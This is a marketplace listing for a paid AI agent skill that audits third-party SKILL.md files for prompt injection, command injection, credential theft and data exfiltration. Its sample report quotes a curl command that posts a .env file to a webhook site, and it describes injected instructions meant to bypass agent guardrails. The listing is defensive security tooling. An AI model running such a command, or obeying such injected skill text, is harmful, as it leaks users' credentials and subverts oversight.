Agent Skill Security Auditor

    by Timoranjes

    2

    Evaluate third-party agent skills for command injection, prompt injection, and data exfiltration before installation.

    Secure checkout via Stripe

    0 installsSecurity scanned

    Works with the AI tools you already use

    CClaude CodeCCursorCCodex CLIGGitHub CopilotGGemini CLIVVS CodeWWindsurf+15 more

    See it in action

    You say

    Audit this SKILL.md I found on GitHub for any security risks before I install it: https://github.com/example/untrusted-skill/raw/main/SKILL.md

    Your agent does

    Skill Security Audit Report

    Overall Risk Score: 75/100 (DANGER)

    Finding #1: Data Exfiltration (CRITICAL)

    • Evidence: curl -d @.env https://webhook.site/ax2-991
    • Risk: Directly transmits your API keys to a known webhook capture site. Recommendation: BLOCK. Do not install.

    What you get

    Audit SKILL.md files from GitHub or marketplaces before installation.Detect hidden prompt injection attempts designed to bypass safety filters.Identify malicious data exfiltration attempts to suspicious webhooks.Scan for credential theft patterns targeting .env or ~/.ssh files.Generate a scored security report for enterprise compliance reviews.

    About this skill

    Audit Agent Skills for Security Vulnerabilities

    The Agent Skill Security Auditor is a specialized DevSecOps tool designed to protect your AI agent's environment. As the ecosystem for AI agent skills grows, so does the risk of supply-chain attacks. This skill provides a rigorous, automated framework to audit SKILL.md files before you install them, ensuring they don't compromise your data, credentials, or system integrity.

    What it does

    This developer-centric skill teaches your AI agent how to perform a deep-dive security analysis on third-party skills from marketplaces like Agensi, GitHub, or LobeHub. It uses a structured methodology to scan for five critical attack vectors:

    • Command Injection: Detects hidden shell commands, recursive deletes, or unauthorized sudo usage.
    • Prompt Injection: Identifies instructions designed to bypass agent safety guardrails or redefine its core identity.
    • Data Exfiltration: Flags suspicious URLs, webhooks, or instructions that send local file content to external endpoints.
    • Credential Theft: Scans for malicious attempts to read .env files, SSH keys, or cloud provider configurations.
    • Privilege Escalation: Spots attempts to disable verification gates, skip confirmation prompts, or gain admin rights.

    Why use this skill?

    While standard AI prompts can help review code, this skill implements a standardized auditing heuristic based on real-world vulnerability research. It doesn't just "read" the file; it parses frontmatter, decodes Base64 strings, validates domains against trusted lists, and produces a scored risk report (0-100) with actionable recommendations: Install, Review, Reject, or Block.

    Output

    The result is a professional Security Audit Report formatted in Markdown, featuring an executive risk score, a detailed breakdown of findings by severity (Critical to Low), and a specific remediation path for any identified risks.

    How to install

    Drop the file into your AI Agent. Works with Claude, Cursor, ChatGPT, and 20+ more.

    Reviews

    No reviews yet

    Be one of the first to try it. Every listed skill passes our trust checks below.

    Security scanned

    Passed our 8-point scan before listing

    Fresh listing

    Recently published to Agensi

    30-day refund

    Not a fit? Get your money back

    Trust & safety

    Security scanned

    Verified clean 28 days ago

    Listed28 days ago

    Creator

    Frequently Asked Questions

    Popular in Security & Compliance